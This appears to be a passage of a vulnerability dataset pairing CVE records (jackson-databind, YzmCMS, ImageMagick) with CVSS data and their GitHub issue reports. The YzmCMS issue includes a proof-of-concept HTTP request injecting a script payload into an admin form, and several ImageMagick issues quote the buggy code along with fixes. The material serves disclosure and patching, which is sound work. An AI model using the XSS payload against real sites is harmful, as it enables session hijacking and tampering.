"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "04641592-DAF4-47BB-A9DE-FC4C84A20401",
"versionEndExcluding": "2.9.9.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/2341 | [
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | Similar to other polymorphic types with no limits, but for XXE with `jdom2.jar`, tracked as `CVE-2019-12814`.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Fixed in:
* 2.9.10
* 2.8.11.4
* 2.7.9.6
* 2.6.7.3
| Block yet another gadget type (jdom, CVE-2019-12814) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2341/comments | 35 | 2019-06-04T04:08:07Z | 2019-10-16T04:53:30Z | https://github.com/FasterXML/jackson-databind/issues/2341 | 451,788,559 | 2,341 |
CVE-2018-16247 | 2019-06-20T16:15:11.087 | YzmCMS 5.1 has XSS via the admin/system_manage/user_config_add.html title parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yzmcms:yzmcms:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0A656260-E114-4D4D-A5E7-E56F6B97245C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yzmcms/yzmcms/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yzmcms",
"yzmcms"
] | http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html
XSS, payload :<script>alert(1);</script>
POC:
POST /yzmcms/admin/system_manage/user_config_add.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Cookie: joomla_remember_me_c40951350a7b1d9e2f1f81bd68d4c7af=yDotjSEyelPNb7k2.SOiDnuEJcliS7ROVynsH; iCMS_USER_AUTH=ea3c82fdxtNpijGe2IcYUlDjKfAAXlWqnxWAp7EojSadbYwHa%252Bh3Zq7%252BjCfDqMKPx6pkNpj3ZZT92FQuoAyytZfdEbYtT1A34Gne45d1INF5iaFBjIuVIWDHBGQOgw4IGmsPnt5i5%252BmnAvgfU4L3K0orglxQZCniWdUDVNOI%252BCJ29iJAExa2971EW14stwOFgWpU8%252BDTRj2RBu0dYPKIfSAKSW7RAKXO%252FUey1bqkg2V9hcb1gr4bUZhW2Zri3MuvJHdG6PLowrW77vi%252FoiaT6keckp7NNtr%252B1rr89QNrGyMk0AGNWZBUZdiD3BWuRSb8SKeUqVkkSCR%252B4Nb8tx1Nt0cmy%252F5QoZI3zDDRO8lQtpsGvyXIQdEPozb3eoBpLQijBAH%252BSrJodfsx8It3Sx%252FifTTVjKoLaieUNJVp%252B1HWBSbp%252BdeDefD8lKlayAlNoUe6L8v25JgkYFQJk9ty6plHu9KMxnk5ez9K%252BJX94d34X0d9uNSl16evfTh7ChrQNVlGiI5Xr7Yzwljydw7GbFYMuJhva%252BtfsTM; iCMS_userid=ae106e82Um%252F8Sl5cXKohwNL7HAT%252BJ8wbzRQrQxqC7ED5A4UZuw; iCMS_nickname=95d20a9ecX5js7g1ZjSe%252BO2PfWuvEpHcyf48apmBlHwSdCYM; iCMS_article_category_tabs=tree; bdshare_firstime=1534386202388; iCMS_redirect_num=1; 4a6f86430a9361b19459111df44aa326=aq59ps9ldq5c7598mm3lvcgdu0; joomla_user_state=logged_in; 12abbf4bf5e97f8392f838840fa944c4=74c507ed3havfnb90ts30iqlm3; iCMS_iCMS_AUTH=440aab71gT2MFtBaHQPwHaJS37c4iboInDqYaXOVjDSZkAHQHUM%252FvSDaZZV2tJKP%252ByH6FOQF7EtDBwXRZWs1h82dc11QZVBKHEz%252FB6E5tVplvHn4ARKu; PHPSESSID=f9trn71r781tg75v2fpqi9uel6; yzmphp_adminid=57c4QWyUo5m6tWVXPMc6uWaZHWa2O_83YBC3hx7W; yzmphp_adminname=dfd3xEcjriOWbvrIYHMl0gTppKSR0jGTHCnGQdsl9yuF
Connection: close
name=1&fieldtype=textarea&value=test&title=<script>alert(1);</script>&status=1&dosubmit=1
![_20180816131313](https://user-images.githubusercontent.com/33438164/44189855-d2c22b80-a156-11e8-9822-5c3c141061b6.png)
![_20180816131333](https://user-images.githubusercontent.com/33438164/44189858-d48bef00-a156-11e8-9f7c-eb2476e2c3e6.png)
——中科卓信软件测评技术中心 | yzmcms v5.1 XSS | https://api.github.com/repos/yzmcms/yzmcms/issues/3/comments | 1 | 2018-08-16T05:18:39Z | 2020-01-02T07:59:45Z | https://github.com/yzmcms/yzmcms/issues/3 | 351,058,717 | 3 |
CVE-2019-12974 | 2019-06-26T18:15:10.167 | A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1515"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1515 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a null pointer deference vulnerablity in function ReadPANGOImage in coders/pango.c
```
option=GetImageOption(image_info,"filename");
if (option == (const char *) NULL)
property=InterpretImageProperties((ImageInfo *) image_info,image,
image_info->filename,exception);
else
if (LocaleNCompare(option,"pango:",6) == 0)
property=InterpretImageProperties((ImageInfo *) image_info,image,option+6,
exception);
else
property=InterpretImageProperties((ImageInfo *) image_info,image,option,
exception);
(void) SetImageProperty(image,"caption",property,exception);
```
(https://github.com/ImageMagick/ImageMagick/blob/master/coders/pango.c#L202)
The return value of InterpretImageProperties may be NULL, and then there is a null pointer deference.
See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6152 and https://github.com/ImageMagick/ImageMagick/commit/93a9ccc85bd62b21bc4246fc6a8c2b7a32f8d678 for details.
| Null pointer deference in function ReadPANGOImage in coders/pango.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1515/comments | 3 | 2019-03-21T03:25:02Z | 2019-06-27T01:28:59Z | https://github.com/ImageMagick/ImageMagick/issues/1515 | 423,558,712 | 1,515 |
CVE-2019-12975 | 2019-06-26T18:15:10.213 | ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1517"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1517 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a possible but rare memory leak in function `WriteDPXImage` in coders/dpx.c.
```
pixels=(unsigned char *) GetQuantumPixels(quantum_info);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
(void) ExportQuantumPixels(image,(CacheView *) NULL,quantum_info,
quantum_type,pixels,exception);
count=WriteBlob(image,extent,pixels);
if (count != (ssize_t) extent)
break;
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
quantum_info=DestroyQuantumInfo(quantum_info);
(void) CloseBlob(image);
return(status);
```
We should call `ThrowWriterException(CorruptImageError,"UnableToWriteImageData");` when condition `y < (ssize_t) image->rows` satisfies behind for-loop.
See commit https://github.com/ImageMagick/ImageMagick/commit/f1cc2eb986dc8f4a7727bce689a17566f896fde6 for more details.
| Possible but rare memory leak in function WriteDPXImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1517/comments | 2 | 2019-03-21T06:25:46Z | 2019-06-27T01:29:21Z | https://github.com/ImageMagick/ImageMagick/issues/1517 | 423,586,613 | 1,517 |
CVE-2019-12976 | 2019-06-26T18:15:10.277 | ImageMagick 7.0.8-34 has a memory leak in the ReadPCLImage function in coders/pcl.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1520"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1520 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a memory leak in function ReadPCLImage in coders/pcl.c.
```
(void) FormatLocaleString(geometry,MagickPathExtent,"%.20gx%.20g",(double)
page.width,(double) page.height);
if (image_info->monochrome != MagickFalse)
delegate_info=GetDelegateInfo("pcl:mono",(char *) NULL,exception);
else
if (cmyk != MagickFalse)
delegate_info=GetDelegateInfo("pcl:cmyk",(char *) NULL,exception);
else
delegate_info=GetDelegateInfo("pcl:color",(char *) NULL,exception);
if (delegate_info == (const DelegateInfo *) NULL)
return((Image *) NULL);
```
We should call `DestroyImage` before return statement.
```
if (delegate_info == (const DelegateInfo *) NULL)
- return((Image *) NULL);
+ {
+ image=DestroyImage(image);
+ return((Image *) NULL);
+ }
```
| Memory leak in function ReadPCLImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1520/comments | 2 | 2019-03-21T07:25:10Z | 2019-06-27T01:29:46Z | https://github.com/ImageMagick/ImageMagick/issues/1520 | 423,598,777 | 1,520 |
CVE-2019-12977 | 2019-06-26T18:15:10.323 | ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the WriteJP2Image function in coders/jp2.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1518"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1518 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There a use-of-uninitialized-value vulnerability in function WriteJP2Image in coders/jp2.c.
```
if (image_info->extract != (char *) NULL)
{
RectangleInfo
geometry;
int
flags;
/*
Set tile size.
*/
flags=ParseAbsoluteGeometry(image_info->extract,&geometry);
parameters.cp_tdx=(int) geometry.width;
parameters.cp_tdy=(int) geometry.width;
if ((flags & HeightValue) != 0)
parameters.cp_tdy=(int) geometry.height;
if ((flags & XValue) != 0)
parameters.cp_tx0=geometry.x;
if ((flags & YValue) != 0)
parameters.cp_ty0=geometry.y;
parameters.tile_size_on=OPJ_TRUE;
}
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/jp2.c#L853
We should call `(void) memset(&geometry,0,sizeof(geometry));` after declaration.
See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6441, https://github.com/ImageMagick/ImageMagick/commit/eeb68ee77dfb2b508284e4ea7d49e8b807d32783 and 81bfff2759854654bf07e452bf3b9b329f3c55e5 for detail.
| Use-of-uninitialized-value in function WriteJP2Image | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1518/comments | 4 | 2019-03-21T06:44:34Z | 2019-06-27T01:30:10Z | https://github.com/ImageMagick/ImageMagick/issues/1518 | 423,590,022 | 1,518 |
CVE-2019-12978 | 2019-06-26T18:15:10.370 | ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
